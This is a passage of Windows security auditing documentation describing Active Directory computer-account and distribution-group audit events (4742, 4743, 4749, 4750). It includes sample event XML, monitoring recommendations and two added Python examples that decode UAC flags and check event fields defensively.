• Home Directory [Type = UnicodeString]: user's home directory. If the homeDrive attribute is set and specifies a drive letter, homeDirectory should be a UNC path. The path must be a network UNC of the form \\Server\Share\Directory. If the value of the homeDirectory attribute of the computer object was changed, you will see the new value here. For computer objects, it is optional, and typically is not set. You can change this attribute by using Active Directory Users and Computers, or through a script, for example.
• Home Drive [Type = UnicodeString]: specifies the drive letter to which to map the UNC path specified by the account’s homeDirectory attribute. The drive letter must be specified in the form “DRIVE_LETTER:”. For example – “H:”. If the value of the homeDrive attribute of the computer object was changed, you will see the new value here. For computer objects, it is optional, and typically is not set. You can change this attribute by using Active Directory Users and Computers, or through a script, for example.
• Script Path [Type = UnicodeString]: specifies the path of the account’s logon script. If the value of the scriptPath attribute of the computer object was changed, you will see the new value here. For computer objects, it is optional, and typically is not set. You can change this attribute by using Active Directory Users and Computers, or through a script, for example.
• Profile Path [Type = UnicodeString]: specifies a path to the account's profile. This value can be a null string, a local absolute path, or a UNC path. If the value of the profilePath attribute of the computer object was changed, you will see the new value here. For computer objects, it is optional, and typically is not set. You can change this attribute by using Active Directory Users and Computers, or through a script, for example.
• User Workstations [Type = UnicodeString]: contains the list of NetBIOS or DNS names of the computers from which the user can log on. Each computer name is separated by a comma. The name of a computer is the sAMAccountName property of a computer object. If the value of the userWorkstations attribute of the computer object was changed, you will see the new value here. For computer objects, it is optional, and typically is not set. You can change this attribute by using Active Directory Users and Computers, or through a script, for example.
• Password Last Set [Type = UnicodeString]: last time the account’s password was modified. If the value of the pwdLastSet attribute of the computer object was changed, you will see the new value here. For example: 8/12/2015 11:41:39 AM. This value will be changed, for example, after a manual computer account reset action or automatically every 30 days by default for computer objects.
• Account Expires [Type = UnicodeString]: the date when the account expires. If the value of the accountExpires attribute of the computer object was changed, you will see the new value here. For computer objects, it is optional, and typically is not set. You can change this attribute by using Active Directory Users and Computers, or through a script, for example.
• Primary Group ID [Type = UnicodeString]: Relative Identifier (RID) of the computer object’s primary group.

Note A relative identifier (RID) is a variable length number that is assigned to objects at creation and becomes part of the object's Security Identifier (SID) that uniquely identifies an account or group within a domain.

  This field will contain some value if the computer object’s primary group was changed. You can change a computer’s primary group using the Active Directory Users and Computers management console in the Member Of tab of the computer object properties. You will see the RID of the new primary group as the field value. For example, 515 (Domain Computers), for workstations, is a default primary group.
  Typical Primary Group values for computer accounts:
  • 516 (Domain Controllers) – for domain controllers.
  • 521 (Read-only Domain Controllers) – read-only domain controllers (RODC).
  • 515 (Domain Computers) – servers and workstations.
  See this article https://support.microsoft.com/kb/243330 for more information. If the value of the primaryGroupID attribute of the computer object was changed, you will see the new value here.
• AllowedToDelegateTo [Type = UnicodeString]: the list of SPNs to which this account can present delegated credentials. Can be changed using the Active Directory Users and Computers management console in the Delegation tab of the computer account. If the SPNs list on the Delegation tab of a computer account was changed, you will see the new SPNs list in the AllowedToDelegateTo field (note that you will see the new list instead of the changes) of this event. This is an example of AllowedToDelegateTo:
  dcom/WIN2012
  dcom/WIN2012.contoso.local
  If the value of the msDS-AllowedToDelegateTo attribute of the computer object was changed, you will see the new value here.
  The value can be <value not set>, for example, if delegation was disabled.

Note A Service Principal Name (SPN) is the name by which a client uniquely identifies an instance of a service. If you install multiple instances of a service on computers throughout a forest, each instance must have its own SPN. A given service instance can have multiple SPNs if there are multiple names that clients might use for authentication. For example, an SPN always includes the name of the host computer on which the service instance is running, so a service instance might register an SPN for each name or alias of its host.

• Old UAC Value [Type = UnicodeString]: specifies flags that control password, lockout, disable/enable, script, and other behavior for the user or computer account. This parameter contains the previous value of the userAccountControl attribute of the computer object.
• New UAC Value [Type = UnicodeString]: specifies flags that control password, lockout, disable/enable, script, and other behavior for the user or computer account. If the value of the userAccountControl attribute of the computer object was changed, you will see the new value here.
  To decode this value, you can go through the property value definitions in “Table 7. User’s or Computer’s account UAC flags.” from largest to smallest. Compare each property value to the flags value in the event. If the flags value in the event is greater than or equal to the property value, then the property is "set" and applies to that event. Subtract the property value from the flags value in the event, note that the flag applies, and then go on to the next flag.
  Here's an example: Flags value from event: 0x15
  Decoding:
  • PASSWD_NOTREQD 0x0020
  • LOCKOUT 0x0010
  • HOMEDIR_REQUIRED 0x0008
  • (undeclared) 0x0004
  • ACCOUNTDISABLE 0x0002
  • SCRIPT 0x0001
  0x0020 > 0x15, so PASSWD_NOTREQD does not apply to this event
  0x10 < 0x15, so LOCKOUT applies to this event. 0x15 - 0x10 = 0x5
  0x4 < 0x5, so the undeclared value is set. We'll pretend it doesn't mean anything. 0x5 - 0x4 = 0x1
  0x2 > 0x1, so ACCOUNTDISABLE does not apply to this event
  0x1 = 0x1, so SCRIPT applies to this event. 0x1 - 0x1 = 0x0, we're done.
  So this UAC flags value decodes to: LOCKOUT and SCRIPT
• User Account Control [Type = UnicodeString]: shows the list of changes in the userAccountControl attribute. You will see a line of text for each change. See possible values in “Table 7. User’s or Computer’s account UAC flags.” In the “User Account Control field text” column, you can see the text that will be displayed in the User Account Control field in the 4742 event.
• User Parameters [Type = UnicodeString]: if you change any setting using the Active Directory Users and Computers management console in the Dial-in tab of the computer account properties, then you will see <value changed, but not displayed> in this field.
• SID History [Type = UnicodeString]: contains previous SIDs used for the object if the object was moved from another domain. Whenever an object is moved from one domain to another, a new SID is created and becomes the objectSID. The previous SID is added to the sIDHistory property. If the value of the sIDHistory attribute of the computer object was changed, you will see the new value here.
• Logon Hours [Type = UnicodeString]: hours that the account is allowed to log on to the domain. If the value of the logonHours attribute of the computer object was changed, you will see the new value here. For computer objects, it is optional, and typically is not set. You can change this attribute by using Active Directory Users and Computers, or through a script, for example.
• DNS Host Name [Type = UnicodeString]: name of the computer account as registered in DNS. If the value of the dNSHostName attribute of the computer object was changed, you will see the new value here.
• Service Principal Names [Type = UnicodeString]: the list of SPNs registered for the computer account. If the SPN list of a computer account changed, you will see the new SPN list in the Service Principal Names field (note that you will see the new list instead of the changes). If the value of the servicePrincipalName attribute of the computer object was changed, you will see the new value here.
  Here is an example of the Service Principal Names field for a newly domain-joined workstation in event 4742 on a domain controller, after the workstation reboots:
  HOST/Win81.contoso.local
  RestrictedKrbHost/Win81.contoso.local
  HOST/WIN81
  RestrictedKrbHost/WIN81
  TERMSRV/Win81.contoso.local
Additional Information:
• Privileges [Type = UnicodeString]: the list of user privileges which were used during the operation, for example, SeBackupPrivilege. This parameter might not be captured in the event, and in that case appears as “-”. See the full list of user privileges in “Table 8. User Privileges.”
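The decoding procedure described under New UAC Value above, carried out in code so that the Old UAC Value and New UAC Value fields of a 4742 event can be compared automatically. This is an added example, not code from the Microsoft article: FLAG_TABLE holds only the six Table 7 entries the article's worked example lists (extending it with the full Table 7 before real use is assumed), and the function names are mine.

```python
"""Decode and compare the Old/New UAC Value fields of a 4742 event.

Added example, not from the Microsoft article. It follows the article's
method (walk the flag table from the largest value down and subtract each
value that fits). FLAG_TABLE is only the subset of "Table 7. User's or
Computer's account UAC flags" that the article's worked example lists;
extending it with the full table is assumed for real events.
"""

# Subset of Table 7, exactly the values the article's example uses.
FLAG_TABLE = {
    "PASSWD_NOTREQD": 0x0020,
    "LOCKOUT": 0x0010,
    "HOMEDIR_REQUIRED": 0x0008,
    "(undeclared)": 0x0004,   # the article ignores this bit when summarising
    "ACCOUNTDISABLE": 0x0002,
    "SCRIPT": 0x0001,
}


def parse_uac(text):
    """Turn the event's hexadecimal string ('0x15', '0x2080') into an int.

    The field reads '-' when the attribute did not change; return None then.
    """
    text = text.strip()
    if text == "-":
        return None
    return int(text, 16)


def decode_uac(value, table=FLAG_TABLE, include_undeclared=False):
    """Decode from the largest table value down, as the article describes.

    Every table value is a single bit, so testing `remaining & bit` gives the
    same result as the article's "greater than or equal, then subtract" walk
    while staying correct when a bit is missing from the table. Bits that no
    table entry covers are reported as UNKNOWN rather than silently dropped.
    """
    names = []
    remaining = value
    for name, bit in sorted(table.items(), key=lambda kv: kv[1], reverse=True):
        if remaining & bit:
            remaining -= bit
            if include_undeclared or not name.startswith("(undeclared"):
                names.append(name)
    if remaining:
        names.append("UNKNOWN(0x%x)" % remaining)
    return names


def diff_uac(old, new, table=FLAG_TABLE):
    """Flag names enabled and disabled between Old UAC Value and New UAC Value."""
    old_names = decode_uac(old, table)
    new_names = decode_uac(new, table)
    enabled = [n for n in new_names if n not in old_names]
    disabled = [n for n in old_names if n not in new_names]
    return enabled, disabled


def describe_change(old_text, new_text, table=FLAG_TABLE):
    """Summarise the UAC change carried by one 4742 event's two fields."""
    old, new = parse_uac(old_text), parse_uac(new_text)
    if old is None or new is None:
        return {"changed": False}
    enabled, disabled = diff_uac(old, new, table)
    return {
        "changed": old != new,
        "old": decode_uac(old, table),
        "new": decode_uac(new, table),
        "enabled": enabled,
        "disabled": disabled,
    }


if __name__ == "__main__":
    # The article's worked example: 0x15 decodes to LOCKOUT and SCRIPT.
    print(decode_uac(0x15))
    # A constructed change: LOCKOUT cleared, SCRIPT kept.
    print(describe_change("0x15", "0x01"))
```

Because the walk is table-driven, the same functions work unchanged once FLAG_TABLE is filled in with the rest of Table 7; values the table does not cover surface as UNKNOWN entries so an incomplete table cannot hide a flag change.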
Security Monitoring Recommendations

For 4742(S): A computer account was changed.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

• If you have critical domain computer accounts (database servers, domain controllers, administration workstations, and so on) for which you need to monitor each change, monitor this event with the “Computer Account That Was Changed\Security ID” that corresponds to the high-value account or accounts.
• If you have computer accounts for which any change in the services list on the Delegation tab should be monitored, monitor this event when AllowedToDelegateTo is not -. This value means the services list was changed.
Consider whether to track the following fields and values:

FIELD AND VALUE TO TRACK / REASON TO TRACK

Display Name is not -
User Principal Name is not -
Home Directory is not -
Home Drive is not -
Script Path is not -
Profile Path is not -
User Workstations is not -
Account Expires is not -
Logon Hours is not -
    Typically these fields are - for computer accounts. Other values might indicate an anomaly and should be monitored.

Password Last Set changes occur more often than usual
    Changes that are more frequent than the default (typically once a month) might indicate an anomaly or attack.

Primary Group ID is not 516, 521, or 515
    Typically, the Primary Group ID value is one of the following:
    516 for domain controllers
    521 for read-only domain controllers (RODCs)
    515 for servers and workstations (domain computers)
    Other values should be monitored.

For computer accounts for which the services list (on the Delegation tab) should not be empty: AllowedToDelegateTo is marked <value not set>
    If AllowedToDelegateTo is marked <value not set> on computers that previously had a services list (on the Delegation tab), it means the list was cleared.

SID History is not -
    This field will always be set to - unless the account was migrated from another domain.

Consider whether to track the following account control flags:

USER ACCOUNT CONTROL FLAG TO TRACK / INFORMATION ABOUT THE FLAG

'Password Not Required' – Enabled
    Should not be set for computer accounts. Computer accounts typically require a password by default, except manually created computer objects.

'Encrypted Text Password Allowed' – Enabled
    Should not be set for computer accounts. By default, it will not be set, and it cannot be set in the account properties in Active Directory Users and Computers.

'Server Trust Account' – Enabled
    Should be enabled only for domain controllers.

'Server Trust Account' – Disabled
    Should not be disabled for domain controllers.

'Don't Expire Password' – Enabled
    Should not be enabled for computer accounts, because the password automatically changes every 30 days by default. For computer accounts, this flag cannot be set in the account properties in Active Directory Users and Computers.

'Smartcard Required' – Enabled
    Should not be enabled for computer accounts.

'Trusted For Delegation' – Enabled
    Means that Kerberos Constrained or Unconstrained delegation was enabled for the computer account. We recommend monitoring this to discover whether it is an approved action (done by an administrator), a mistake, or a malicious action.

'Trusted For Delegation' – Disabled
    Means that Kerberos Constrained or Unconstrained delegation was disabled for the computer account. We recommend monitoring this to discover whether it is an approved action (done by an administrator), a mistake, or a malicious action. Also, if you have a list of computer accounts for which delegation is critical and should not be disabled, monitor this for those accounts.

'Trusted To Authenticate For Delegation' – Enabled
    Means that Protocol Transition delegation was enabled for the computer account. We recommend monitoring this to discover whether it is an approved action (done by an administrator), a mistake, or a malicious action.

'Trusted To Authenticate For Delegation' – Disabled
    Means that Protocol Transition delegation was disabled for the computer account. We recommend monitoring this to discover whether it is an approved action (done by an administrator), a mistake, or a malicious action. Also, if you have a list of computer accounts for which delegation is critical and should not be disabled, monitor this for those accounts.

'Not Delegated' – Enabled
    Means that "Account is sensitive and cannot be delegated" was selected for the computer account. For computer accounts, this flag cannot be set using the graphical interface. We recommend monitoring this to discover whether it is an approved action (done by an administrator), a mistake, or a malicious action.

'Use DES Key Only' – Enabled
    Should not be enabled for computer accounts. For computer accounts, it cannot be set in the account properties in Active Directory Users and Computers.

'Don't Require Preauth' – Enabled
    Should not be enabled for computer accounts. For computer accounts, it cannot be set in the account properties in Active Directory Users and Computers.
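The field checks from the 4741 and 4742 recommendation tables above, applied to event records so that they can be run over exported Security log XML. This is an added example and not Microsoft's code: the 4742 sample is the article's own Event XML trimmed to the fields the checks read, the 4741 record is constructed, and the finding texts and the critical_sids parameter are my own naming, not anything the events carry.

```python
"""Field checks from the 4741 and 4742 monitoring recommendations.

Added example, not Microsoft's code. SAMPLE_4742_XML is the article's own
event trimmed to the fields read here; SAMPLE_4741 is constructed. Finding
texts and the critical_sids parameter are this example's own naming.
"""
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

SAMPLE_4742_XML = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4742</EventID><Computer>DC01.contoso.local</Computer></System>
  <EventData>
    <Data Name="TargetUserName">WIN81$</Data>
    <Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-6116</Data>
    <Data Name="DisplayName">-</Data>
    <Data Name="UserPrincipalName">-</Data>
    <Data Name="HomeDirectory">-</Data>
    <Data Name="HomePath">-</Data>
    <Data Name="ScriptPath">-</Data>
    <Data Name="ProfilePath">-</Data>
    <Data Name="UserWorkstations">-</Data>
    <Data Name="PasswordLastSet">-</Data>
    <Data Name="AccountExpires">-</Data>
    <Data Name="PrimaryGroupId">-</Data>
    <Data Name="AllowedToDelegateTo">%%1793</Data>
    <Data Name="OldUacValue">0x80</Data>
    <Data Name="NewUacValue">0x2080</Data>
    <Data Name="SidHistory">-</Data>
    <Data Name="LogonHours">-</Data>
  </EventData>
</Event>"""

# Constructed 4741 record: a manually created account with an RODC primary group.
SAMPLE_4741 = {
    "SamAccountName": "RODC02$", "DisplayName": "-", "UserPrincipalName": "-",
    "HomeDirectory": "-", "HomePath": "-", "ScriptPath": "-", "ProfilePath": "-",
    "UserWorkstations": "-", "AllowedToDelegateTo": "-",
    "PasswordLastSet": "<never>", "AccountExpires": "<never>",
    "PrimaryGroupId": "521", "OldUacValue": "0x0", "SidHistory": "-",
    "LogonHours": "<value not set>",
}

# Changed Attributes that the tables say are normally "-" for computer accounts.
DASH_4741 = ("DisplayName", "UserPrincipalName", "HomeDirectory", "HomePath",
             "ScriptPath", "ProfilePath", "UserWorkstations", "AllowedToDelegateTo")
DASH_4742 = ("DisplayName", "UserPrincipalName", "HomeDirectory", "HomePath",
             "ScriptPath", "ProfilePath", "UserWorkstations", "AccountExpires",
             "LogonHours")
TYPICAL_PRIMARY_GROUPS = {"515", "516", "521"}


def parse_event(xml_text):
    """Return (EventID, {Data Name: value}) from one exported Security event."""
    root = ET.fromstring(xml_text)
    event_id = int(root.find("e:System/e:EventID", NS).text)
    data = {d.get("Name"): (d.text or "").strip()
            for d in root.findall("e:EventData/e:Data", NS)}
    return event_id, data


def check_4741(d):
    """Findings for 'A computer account was created'."""
    f = []
    if d.get("SamAccountName", "-") in ("", "-"):
        f.append("SAM Account Name is empty or '-'")
    f += ["%s is not '-': %r" % (k, d[k]) for k in DASH_4741 if d.get(k, "-") != "-"]
    if d.get("PasswordLastSet") == "<never>":
        f.append("Password Last Set is <never>: manually created computer account")
    if d.get("AccountExpires", "<never>") != "<never>":
        f.append("Account Expires is set")
    pg = d.get("PrimaryGroupId")
    if pg in ("516", "521"):
        f.append("Primary Group ID %s: new domain controller or RODC" % pg)
    elif pg != "515":
        f.append("Primary Group ID %r is not a typical value" % pg)
    if d.get("OldUacValue", "0x0") != "0x0":
        f.append("Old UAC Value is not 0x0")
    if d.get("SidHistory", "-") != "-":
        f.append("SID History is set: account migrated from another domain")
    if d.get("LogonHours", "<value not set>") != "<value not set>":
        f.append("Logon Hours is set")
    return f


def check_4742(d, critical_sids=frozenset()):
    """Findings for 'A computer account was changed'."""
    f = []
    if d.get("TargetSid") in critical_sids:
        f.append("critical computer account changed: %s" % d.get("TargetUserName"))
    if d.get("AllowedToDelegateTo", "-") != "-":
        f.append("AllowedToDelegateTo is not '-': Delegation tab services list changed")
    f += ["%s is not '-': %r" % (k, d[k]) for k in DASH_4742 if d.get(k, "-") != "-"]
    pg = d.get("PrimaryGroupId", "-")
    if pg != "-" and pg not in TYPICAL_PRIMARY_GROUPS:
        f.append("Primary Group ID changed to atypical value %r" % pg)
    if d.get("SidHistory", "-") != "-":
        f.append("SID History is set: account migrated from another domain")
    return f


def check_event(event_id, data, critical_sids=frozenset()):
    """Dispatch on EventID; events this example does not cover yield nothing."""
    if event_id == 4741:
        return check_4741(data)
    if event_id == 4742:
        return check_4742(data, critical_sids)
    return []
```

On the article's own 4742 sample every Changed Attribute is "-" except AllowedToDelegateTo, so the only finding is the delegation-list change; supplying the target's SID in critical_sids adds the high-value-account finding on top.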

4743(S): A computer account was deleted.
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Computer Account Management
Event Description:
This event generates every time a computer object is deleted.
This event generates only on domain controllers.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4743</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>13825</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-08-14T15:57:08.104214100Z" />
    <EventRecordID>172103</EventRecordID>
    <Correlation />
    <Execution ProcessID="520" ThreadID="1108" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="TargetUserName">COMPUTERACCOUNT$</Data>
    <Data Name="TargetDomainName">CONTOSO</Data>
    <Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-6118</Data>
    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x3007b</Data>
    <Data Name="PrivilegeList">-</Data>
  </EventData>
</Event>

Required Server Roles: Active Directory domain controller.
Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Field Descriptions:
Subject:
• Security ID [Type = SID]: SID of the account that requested the “delete Computer object” operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

• Account Name [Type = UnicodeString]: the name of the account that requested the “delete Computer object” operation.
• Account Domain [Type = UnicodeString]: subject’s domain name. Formats vary, and include the following:
  • Domain NETBIOS name example: CONTOSO
  • Lowercase full domain name: contoso.local
  • Uppercase full domain name: CONTOSO.LOCAL
  For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the value of this field is “NT AUTHORITY”.
• Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Target Computer:
• Security ID [Type = SID]: SID of the deleted computer account. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.
• Account Name [Type = UnicodeString]: the name of the computer account that was deleted. For example: WIN81$
• Account Domain [Type = UnicodeString]: domain name of the deleted computer account. Formats vary, and include the following:
  • Domain NETBIOS name example: CONTOSO
  • Lowercase full domain name: contoso.local
  • Uppercase full domain name: CONTOSO.LOCAL
Additional Information:
• Privileges [Type = UnicodeString]: the list of user privileges which were used during the operation, for example, SeBackupPrivilege. This parameter might not be captured in the event, and in that case appears as “-”. See the full list of user privileges in “Table 8. User Privileges.”

Security Monitoring Recommendations

For 4743(S): A computer account was deleted.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you have critical domain computer accounts (database servers, domain controllers, administration workstations, and so on) for which you need to monitor each action (especially deletion), monitor this event with the “Target Computer\Security ID” or “Target Computer\Account Name” that corresponds to the high-value account or accounts.

Audit Distribution Group Management
4/5/2019 • 4 minutes to read

Applies to
Windows 10
Windows Server 2016
Audit Distribution Group Management determines whether the operating system generates audit events for specific distribution-group management tasks.
This subcategory generates events only on domain controllers.
Event volume: Low on domain controllers.
This subcategory allows you to audit events generated by changes to distribution groups such as the following:
• Distribution group is created, changed, or deleted.
• Member is added or removed from a distribution group.
If you need to monitor for group type changes, you need to monitor for “4764: A group’s type was changed.” “Audit Security Group Management” subcategory success auditing must be enabled.

COMPUTER TYPE       GENERAL SUCCESS   GENERAL FAILURE   STRONGER SUCCESS   STRONGER FAILURE
Domain Controller   IF                No                IF                 No
Member Server       No                No                No                No
Workstation         No                No                No                No

COMMENTS

Domain Controller: IF - Typically actions related to distribution groups have low security relevance; it is much more important to monitor Security Group changes. But if you want to monitor for critical distribution group changes, such as a member being added to an internal critical distribution group (executives, administrative group, for example), you need to enable this subcategory for Success auditing. Typically the volume of these events is low on domain controllers. This subcategory doesn’t have Failure events, so there is no recommendation to enable Failure auditing for this subcategory.

Member Server: This subcategory generates events only on domain controllers.

Workstation: This subcategory generates events only on domain controllers.

Events List:
4749(S): A security-disabled global group was created.
4750(S): A security-disabled global group was changed.
4751(S): A member was added to a security-disabled global group.
4752(S): A member was removed from a security-disabled global group.
4753(S): A security-disabled global group was deleted.
4759(S): A security-disabled universal group was created. See event “4749: A security-disabled global group was created.” Event 4759 is the same, but it is generated for a universal distribution group instead of a global distribution group. All event fields, XML, and recommendations are the same. The type of group is the only difference.
4760(S): A security-disabled universal group was changed. See event “4750: A security-disabled global group was changed.” Event 4760 is the same, but it is generated for a universal distribution group instead of a global distribution group. All event fields, XML, and recommendations are the same. The type of group is the only difference.
4761(S): A member was added to a security-disabled universal group. See event “4751: A member was added to a security-disabled global group.” Event 4761 is the same, but it is generated for a universal distribution group instead of a global distribution group. All event fields, XML, and recommendations are the same. The type of group is the only difference.
4762(S): A member was removed from a security-disabled universal group. See event “4752: A member was removed from a security-disabled global group.” Event 4762 is the same, but it is generated for a universal distribution group instead of a global distribution group. All event fields, XML, and recommendations are the same. The type of group is the only difference.
4763(S): A security-disabled universal group was deleted. See event “4753: A security-disabled global group was deleted.” Event 4763 is the same, but it is generated for a universal distribution group instead of a global distribution group. All event fields, XML, and recommendations are the same. The type of group is the only difference.
4744(S): A security-disabled local group was created. See event “4749: A security-disabled global group was created.” Event 4744 is the same, but it is generated for a local distribution group instead of a global distribution group. All event fields, XML, and recommendations are the same. The type of group is the only difference.
4745(S): A security-disabled local group was changed. See event “4750: A security-disabled global group was changed.” Event 4745 is the same, but it is generated for a local distribution group instead of a global distribution group. All event fields, XML, and recommendations are the same. The type of group is the only difference.
4746(S): A member was added to a security-disabled local group. See event “4751: A member was added to a security-disabled global group.” Event 4746 is the same, but it is generated for a local distribution group instead of a global distribution group. All event fields, XML, and recommendations are the same. The type of group is the only difference.
4747(S): A member was removed from a security-disabled local group. See event “4752: A member was removed from a security-disabled global group.” Event 4747 is the same, but it is generated for a local distribution group instead of a global distribution group. All event fields, XML, and recommendations are the same. The type of group is the only difference.
4748(S): A security-disabled local group was deleted. See event “4753: A security-disabled global group was deleted.” Event 4748 is the same, but it is generated for a local distribution group instead of a global distribution group. All event fields, XML, and recommendations are the same. The type of group is the only difference.
4749(S): A security-disabled global group was created.
4/5/2019 • 3 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Distribution Group Management
Event Description:
This event generates every time a new security-disabled (distribution) global group is created.
This event generates only on domain controllers.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4749</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>13827</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-08-14T16:16:35.568878700Z" />
    <EventRecordID>172181</EventRecordID>
    <Correlation />
    <Execution ProcessID="520" ThreadID="1108" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="TargetUserName">ServiceDesk</Data>
    <Data Name="TargetDomainName">CONTOSO</Data>
    <Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-6119</Data>
    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x3007b</Data>
    <Data Name="PrivilegeList">-</Data>
    <Data Name="SamAccountName">ServiceDesk</Data>
    <Data Name="SidHistory">-</Data>
  </EventData>
</Event>

Required Server Roles: Active Directory domain controller.


Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “create group” operation. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that
user from the database and places it in the access token for that user. The system uses the SID in the access
token to identify the user in all subsequent interactions with Windows security. When a SID has been used as
the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For
more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “create group”
operation.
Account Domain [Type = UnicodeString]: subject’s domain name. Formats vary, and include the
following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Group:
Security ID [Type = SID]: SID of created group. Event Viewer automatically tries to resolve SIDs and show
the group name. If the SID cannot be resolved, you will see the source data in the event.
Group Name [Type = UnicodeString]: the name of the group that was created. For example: ServiceDesk
Group Domain [Type = UnicodeString]: domain name of created group. Formats vary, and include the
following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
Attributes:
SAM Account Name [Type = UnicodeString]: This is the name of the new group used to support clients and
servers from previous versions of Windows (pre-Windows 2000 logon name). It is the value of the
sAMAccountName attribute of the new group object. For example: ServiceDesk
SID History [Type = UnicodeString]: contains previous SIDs used for the object if the object was moved
from another domain. Whenever an object is moved from one domain to another, a new SID is created and
becomes the objectSID. The previous SID is added to the sIDHistory property. This parameter contains the
value of sIDHistory attribute of new group object. This parameter might not be captured in the event, and
in that case appears as “-”.
Additional Information:
Privileges [Type = UnicodeString]: the list of user privileges which were used during the operation, for
example, SeBackupPrivilege. This parameter might not be captured in the event, and in that case appears as “-”.
See the full list of user privileges in “Table 8. User Privileges”.

Security Monitoring Recommendations
For 4749(S): A security-disabled global group was created.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you need to monitor each time a new distribution group is created, to see who created the group and
when, monitor this event. Typically, this event is used as an informational event, to be reviewed if needed.
If your organization has naming conventions for account names, monitor “Attributes\SAM Account
Name” for names that don’t comply with the naming conventions.
4750(S): A security-disabled global group was changed.
4/5/2019 • 5 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Distribution Group Management
Event Description:
This event generates every time a security-disabled (distribution) global group is changed.
This event generates only on domain controllers.
Some changes do not invoke a 4750 event, for example, changes made using the Active Directory Users and Computers management console in the Managed By tab in group account properties.
If you change the name of the group (SAM Account Name), you also get “4781: The name of an account was changed” if “Audit User Account Management” subcategory success auditing is enabled.
If you change the group type, you get a change event from the auditing subcategory of the new group type instead of 4750. If you need to monitor for group type changes, it is better to monitor for “4764: A group’s type was changed.” These events are generated for any group type when the group type is changed. “Audit Security Group Management” subcategory success auditing must be enabled.
From a 4750 event you can get information about changes to the sAMAccountName and sIDHistory attributes; for any other change you will see only that something changed, not what exactly changed.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4750</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>13827</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-08-14T16:38:37.902710700Z" />
    <EventRecordID>172188</EventRecordID>
    <Correlation />
    <Execution ProcessID="520" ThreadID="1108" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="TargetUserName">ServiceDeskMain</Data>
    <Data Name="TargetDomainName">CONTOSO</Data>
    <Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-6119</Data>
